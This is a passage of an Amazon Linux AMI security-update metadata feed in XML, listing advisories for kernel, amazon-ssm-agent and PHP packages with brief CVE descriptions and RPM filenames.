arch="x86_64"><filename>Packages/php73-gmp-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-odbc-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.13-1.22.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.13" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.13-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1919</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1919: important priority package update for kernel</title><issued date="2024-02-14 20:03:00" /><updated date="2024-02-19 19:12:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-1086:
A use-after-free vulnerability in the Linux kernel's netfilter: nf_tables component can be exploited to achieve local privilege escalation.
The nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.
We recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1086" title="" id="CVE-2024-1086" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="179.559.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.336-179.559.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.336-179.559.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.336" release="179.559.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.336-179.559.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1920</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1920: important priority package update for amazon-ssm-agent</title><issued date="2024-02-14 20:03:00" /><updated date="2024-04-25 16:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-49569:
A path traversal vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to create and amend files across the filesystem. In the worse case scenario, remote code execution could be achieved.
Applications are only affected if they are using the ChrootOS https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#ChrootOS , which is the default when using "Plain" versions of Open and Clone funcs (e.g. PlainClone). Applications using BoundOS https://pkg.go.dev/github.com/go-git/go-billy/v5/osfs#BoundOS or in-memory filesystems are not affected by this issue.
This is a go-git implementation issue and does not affect the upstream git cli.
CVE-2023-49568:
A denial of service (DoS) vulnerability was discovered in go-git versions prior to v5.11. This vulnerability allows an attacker to perform denial of service attacks by providing specially crafted responses from a Git server which triggers resource exhaustion in go-git clients.
Applications using only the in-memory filesystem supported by go-git are not affected by this vulnerability.
This is a go-git implementation issue and does not affect the upstream git cli.
CVE-2023-39326:
A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body. A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request. Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.
CVE-2023-39325:
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39325" title="" id="CVE-2023-39325" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39326" title="" id="CVE-2023-39326" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49568" title="" id="CVE-2023-49568" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49569" title="" id="CVE-2023-49569" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="amazon-ssm-agent" version="3.2.2222.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-3.2.2222.0-1.amzn1.x86_64.rpm</filename></package><package name="amazon-ssm-agent-debuginfo" version="3.2.2222.0" release="1.amzn1" epoch="0" arch="x86_64"><filename>Packages/amazon-ssm-agent-debuginfo-3.2.2222.0-1.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1921</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1921: important priority package update for php72</title><issued date="2024-02-14 20:03:00" /><updated date="2024-02-28 23:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18218:
cdf_read_property_info in cdf.c in file through 5.37 does not restrict the number of CDF_VECTOR elements, which allows a heap-based buffer overflow (4-byte out-of-bounds write).
CVE-2019-11050:
When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.
CVE-2019-11049:
In PHP versions 7.3.x below 7.3.13 and 7.4.0 on Windows, when supplying custom headers to mail() function, due to mistake introduced in commit 78f4b4a2dcf92ddbccea1bb95f8390a18ac3342e, if the header is supplied in lowercase, this can result in double-freeing certain memory locations.
CVE-2019-11047:
When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.
CVE-2019-11046:
In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, PHP bcmath extension functions on some systems, including Windows, can be tricked into reading beyond the allocated space by supplying it with string containing characters that are identified as numeric by the OS but aren't ASCII numbers. This can read to disclosure of the content of some memory locations.
CVE-2019-11045:
In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, PHP DirectoryIterator class accepts filenames with embedded \0 byte and treats them as terminating at that byte. This could lead to security vulnerabilities, e.g. in applications checking paths that the code is allowed to access.
CVE-2019-11044:
A flaw was discovered in the link function in PHP. When compiled on Windows, it does not correctly handle paths containing NULL bytes. An attacker could abuse this flaw to bypass application checks on file paths.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11044" title="" id="CVE-2019-11044" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11045" title="" id="CVE-2019-11045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11046" title="" id="CVE-2019-11046" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11047" title="" id="CVE-2019-11047" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11049" title="" id="CVE-2019-11049" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11050" title="" id="CVE-2019-11050" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18218" title="" id="CVE-2019-18218" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php72-tidy" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-tidy-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-dba" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dba-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pdo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-gmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gmp-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-cli" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-cli-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-mbstring" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mbstring-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-xmlrpc" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xmlrpc-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-bcmath" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-bcmath-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pgsql" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pgsql-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-soap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-soap-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-xml" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-xml-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-embedded" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-embedded-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-intl" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-intl-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-snmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-snmp-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pdo-dblib-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-imap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-imap-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-debuginfo-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-odbc" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-odbc-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-enchant" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-enchant-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-json" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-json-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-process" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-process-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-ldap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-ldap-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-common" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-common-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-dbg" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-dbg-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-devel" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-devel-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-opcache" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-opcache-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-recode" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-recode-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-gd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-gd-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-pspell" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pspell-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-fpm" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-fpm-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-mysqlnd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-mysqlnd-7.2.26-1.19.amzn1.x86_64.rpm</filename></package><package name="php72-debuginfo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pspell" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pspell-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pdo-dblib" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-dblib-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-gd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gd-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-embedded" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-embedded-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-snmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-snmp-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-opcache" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-opcache-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-json-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-bcmath" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-bcmath-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-devel-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-xml" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xml-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.26-1.19.amzn1.i686.rpm</filename></package><package name="php72-imap" version="7.2.26" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/php72-imap-7.2.26-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 